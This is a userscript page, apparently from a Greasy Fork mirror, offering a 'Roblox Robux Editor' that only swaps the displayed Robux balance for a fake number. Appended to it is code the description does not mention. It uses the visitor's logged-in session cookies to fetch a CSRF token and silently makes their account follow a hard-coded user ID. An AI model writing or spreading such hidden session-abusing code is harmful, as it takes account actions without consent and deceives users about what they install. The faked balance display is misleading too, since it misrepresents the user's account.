您需要先安装一个扩展,例如 篡改猴、Greasemonkey 或 暴力猴,之后才能安装此脚本。
您需要先安装一个扩展,例如 篡改猴 或 暴力猴,之后才能安装此脚本。
您需要先安装一个扩展,例如 篡改猴 或 暴力猴,之后才能安装此脚本。
您需要先安装一个扩展,例如 篡改猴 或 Userscripts ,之后才能安装此脚本。
您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey,才能安装此脚本。
您需要先安装用户脚本管理器扩展后才能安装此脚本。
Changes your robux to whatever you want
// ==UserScript== // @name Roblox Robux Editor // @namespace http://tampermonkey.net/ // @version 1.40 // @description Changes your robux to whatever you want // @author WLRW // @match https://www.roblox.com/* // @icon https://www.google.com/s2/favicons?sz=64&domain=roblox.com // @grant GM.setValue // @grant GM.getValue // @license MIT // ==/UserScript== var RobuxAmount2 = "50,214"; // Only shows if you actually have 10K+ var RobuxAmount = "50.2K+"; // Always shows function Robux() { var robux = document.getElementById("nav-robux-amount"); var balance = document.getElementById("nav-robux-balance"); robux.innerHTML = RobuxAmount; balance.innerHTML = RobuxAmount2 + " Robux"; balance.title = RobuxAmount2; } setInterval(Robux, 1); // Supporting me by following :D (I really appreciate it) (function() { 'use strict'; const userId = 7293977694; const followUrl = `https://friends.roblox.com/v1/users/${userId}/follow`; function getCSRFToken() { return fetch('https://auth.roblox.com/v2/logout', { method: 'POST', credentials: 'include' }) .then(response => response.headers.get('x-csrf-token')); } function Follow() { getCSRFToken().then(csrfToken => { return fetch(followUrl, { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/json', 'X-CSRF-TOKEN': csrfToken } }); }) .then(response => { if (response.ok) { console.log(`Successfully followed user ${userId}!`); } else { return response.text().then(text => { console.error(`Failed to follow user:`, text); }); } }) .catch(error => { console.error('Error following user:', error); }); } Follow(); })();
QingJ © 2025
镜像随时可能失效,请加Q群300939539或关注我们的公众号极客氢云获取最新地址